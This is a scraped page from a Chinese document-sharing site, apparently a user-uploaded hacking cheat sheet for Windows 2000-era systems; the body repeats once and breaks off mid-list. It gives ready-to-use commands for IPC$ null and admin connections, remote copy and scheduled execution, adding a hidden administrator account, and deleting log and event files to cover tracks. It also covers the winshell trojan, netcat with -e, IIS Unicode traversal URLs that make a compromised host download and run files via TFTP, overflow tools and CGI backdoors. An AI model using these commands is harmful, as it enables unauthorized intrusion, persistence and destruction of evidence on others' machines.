




版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
(與遠程主機建立空管連接)netuse\\IP地址\ipc$""/use:""
(以管理員身份登錄遠程主機)netuse\\IP地址\ipc$"密碼"/use:"Administrator"
(傳送文件到遠程主機WINNT目錄下)copy本機目錄路徑\程序\\IP地址\admin$
(查看遠程主機時間)nettime\\IP地址
(定時啟動某個程序)at\\IP地址02:18readme.exe
(查看共享)netview\\IP地址
(查看netbios工作組列表)nbtstat-AIP地址
(將遠程主機C盤映射為自己的F盤)netusef:\\IP地址\c$""/user:"Administrator"
(這兩條把自己增加到管理員組):netuser用戶名密碼/add
netlocalgroupAdministrators用戶名/add
(斷開連接)netuse\\IP地址\ipc$/delete
=====================================================
擦屁屁:
delC:\winnt\system32\logfiles\*.*
delC:\winnt\system32\config\*.evt
delC:\winnt\system32\dtclog\*.*
delC:\winnt\system32\*.log
delC:\winnt\system32\*.txt
delC:\winnt\*.txt
delC:\winnt\*.log
============================
一、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:
netsvc/list\\IP地址
netsvcschedule\\IP地址/query
netsvc\\IP地址schedule/start
二、OpenTelnet.exe
遠程啟動主機的Telnet服務,并綁定端口到7878,例如:
OpenTelnet\\IP地址用戶名密碼17878
然后就可以telnet到主機的7878端口,進入DOS方式下:
telnetIP地址7878
三、winshell.exe
一個非常小的木馬(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:
pPath(查看winshell主程序的路徑信息)
breBoot(重新啟動機器)
dshutDown(關閉機器)
sShell(執(zhí)行后你就會看到可愛的“C:\>”)
xeXit(退出本次登錄會話,此命令并不終止winshell的運行)
CMD>
http://.../srv.exe
(通過http下載其他網站上的文件到運行winshell的機器上)
四、3389登陸器,GUI方式登錄遠程主機的
五、elsave.exe
事件日志清除工具
elsave-s\\IP地址-l"application"-C
elsave-s\\IP地址-l"system"-C
elsave-s\\IP地址-l"security"-C
執(zhí)行后成功清除應用程序日志,系統(tǒng)日志,安全日志
六、hbulot.exe
開啟win2kserver和winxp的3389服務
hbulot[/r]
使用/r表示安裝完成后自動重起目標使設置生效。
七、nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。
想要連接到某處:nc[-options]hostnameport[s][ports]...
綁定端口等待連接:nc-l-pport[-options][hostname][port]
參數(shù):
-eprog程序重定向,一旦連接,就執(zhí)行[危險!!]
-ggatewaysource-routinghoppoint[s],upto8
-Gnumsource-routingpointer:4,8,12,...
-h幫助信息
-isecs延時的間隔
-l監(jiān)聽模式,用于入站連接
-n指定數(shù)字的IP地址,不能用hostname
-ofile記錄16進制的傳輸
-pport本地端口號
-r任意指定本地及遠程端口
-saddr本地源地址
-uUDP模式
-v詳細輸出——用兩個-v可得到更詳細的內容
-wsecstimeout的時間
-z將輸入輸出關掉——用于掃描時
八、TFTPD32.EXE
把自己的電腦臨時變?yōu)橐慌_FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執(zhí)行,通常要利用Unicode漏洞或telnet到肉雞,例如:
http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/ctftp-i本機IP地址get文件名c:\winnt\system32\文件名
然后可以直接令文件運行:
http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe是IIS的printer遠程緩沖區(qū)溢出工具。idqover.exe是溢出idq的,選擇“溢出后在一個端口監(jiān)聽”,然后用telnet連接它的監(jiān)聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執(zhí)行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。
一、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執(zhí)行權限的目錄。然后用IE瀏覽器連接。
一、Xscan命令行運行參數(shù)說明:
在檢測過程中,按"[空格]"鍵可以查看各線程狀態(tài)及掃描進度,按"q"鍵保存當前數(shù)據(jù)后提前退出程序,按""強行關閉程序。
1.命令格式:xscan-host[-][其他選項]
xscan-file
[其他選項]
其中含義如下:
-port:檢測常用服務的端口狀態(tài)(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項定制待檢測端口列表);
-ftp:檢測FTP弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);
-ntpass:檢測NT-Server弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);
-cgi:檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);
-iis:檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);
[其他選項]含義如下:
-v:顯示詳細掃描進度
-p:跳過Ping不通的主機
-o:跳過沒有檢測到開放端口的主機
-t:指定最大并發(fā)線程數(shù)量和并發(fā)主機數(shù)量,默認數(shù)量為100,10
(與遠程主機建立空管連接)netuse\\IP地址\ipc$""/use:""
(以管理員身份登錄遠程主機)netuse\\IP地址\ipc$"密碼"/use:"Administrator"
(傳送文件到遠程主機WINNT目錄下)copy本機目錄路徑\程序\\IP地址\admin$
(查看遠程主機時間)nettime\\IP地址
(定時啟動某個程序)at\\IP地址02:18readme.exe
(查看共享)netview\\IP地址
(查看netbios工作組列表)nbtstat-AIP地址
(將遠程主機C盤映射為自己的F盤)netusef:\\IP地址\c$""/user:"Administrator"
(這兩條把自己增加到管理員組):netuser用戶名密碼/add
netlocalgroupAdministrators用戶名/add
(斷開連接)netuse\\IP地址\ipc$/delete
=====================================================
擦屁屁:
delC:\winnt\system32\logfiles\*.*
delC:\winnt\system32\config\*.evt
delC:\winnt\system32\dtclog\*.*
delC:\winnt\system32\*.log
delC:\winnt\system32\*.txt
delC:\winnt\*.txt
delC:\winnt\*.log
============================
一、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:
netsvc/list\\IP地址
netsvcschedule\\IP地址/query
netsvc\\IP地址schedule/start
二、OpenTelnet.exe
遠程啟動主機的Telnet服務,并綁定端口到7878,例如:
OpenTelnet\\IP地址用戶名密碼17878
然后就可以telnet到主機的7878端口,進入DOS方式下:
telnetIP地址7878
三、winshell.exe
一個非常小的木馬(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:
pPath(查看winshell主程序的路徑信息)
breBoot(重新啟動機器)
dshutDown(關閉機器)
sShell(執(zhí)行后你就會看到可愛的“C:\>”)
xeXit(退出本次登錄會話,此命令并不終止winshell的運行)
CMD>
http://.../srv.exe
(通過http下載其他網站上的文件到運行winshell的機器上)
四、3389登陸器,GUI方式登錄遠程主機的
五、elsave.exe
事件日志清除工具
elsave-s\\IP地址-l"application"-C
elsave-s\\IP地址-l"system"-C
elsave-s\\IP地址-l"security"-C
執(zhí)行后成功清除應用程序日志,系統(tǒng)日志,安全日志
六、hbulot.exe
開啟win2kserver和winxp的3389服務
hbulot[/r]
使用/r表示安裝完成后自動重起目標使設置生效。
七、nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。
想要連接到某處:nc[-options]hostnameport[s][ports]...
綁定端口等待連接:nc-l-pport[-options][hostname][port]
參數(shù):
-eprog程序重定向,一旦連接,就執(zhí)行[危險!!]
-ggatewaysource-routinghoppoint[s],upto8
-Gnumsource-routingpointer:4,8,12,...
-h幫助信息
-isecs延時的間隔
-l監(jiān)聽模式,用于入站連接
-n指定數(shù)字的IP地址,不能用hostname
-ofile記錄16進制的傳輸
-pport本地端口號
-r任意指定本地及遠程端口
-saddr本地源地址
-uUDP模式
-v詳細輸出——用兩個-v可得到更詳細的內容
-wsecstimeout的時間
-z將輸入輸出關掉——用于掃描時
八、TFTPD32.EXE
把自己的電腦臨時變?yōu)橐慌_FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執(zhí)行,通常要利用Unicode漏洞或telnet到肉雞,例如:
http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/ctftp-i本機IP地址get文件名c:\winnt\system32\文件名
然后可以直接令文件運行:
http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe是IIS的printer遠程緩沖區(qū)溢出工具。idqover.exe是溢出idq的,選擇“溢出后在一個端口監(jiān)聽”,然后用telnet連接它的監(jiān)聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執(zhí)行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。
一○、ntis.exe、
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
- 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 基因編輯技術在抗細菌感染中的應用-全面剖析
- 信用評價技術應用-全面剖析
- 代碼可視化與編輯-全面剖析
- 排序算法在圖像處理中的應用-全面剖析
- 內存安全語言研究-全面剖析
- 2025年固態(tài)、半固態(tài)食品無菌包裝設備項目發(fā)展計劃
- 數(shù)字醫(yī)療數(shù)據(jù)安全策略研究-全面剖析
- 健康管理服務平臺建設計劃
- 供應鏈安全信息化策略-全面剖析
- IT項目投標管理流程
- 2025年池州職業(yè)技術學院單招職業(yè)適應性考試題庫參考答案
- 2024 在中國的美國企業(yè)特別報告
- 二零二五年度電商企業(yè)簽約帶貨主播傭金分成合同
- 佛山市電梯維修安裝工職業(yè)技能競賽實施方案
- 2025年河北交通職業(yè)技術學院單招職業(yè)技能測試題庫完美版
- 2025年合作購車資金分配協(xié)議書
- 高中體育排球課教案
- 《歐帝燃氣灶公司企業(yè)應收賬款管理研究案例報告(10000字論文)》
- 2024年江蘇省揚州市中考數(shù)學試卷(附答案)
- 2025年湖北生物科技職業(yè)學院單招職業(yè)技能測試題庫及參考答案
- 中醫(yī)體質辨識
評論
0/150
提交評論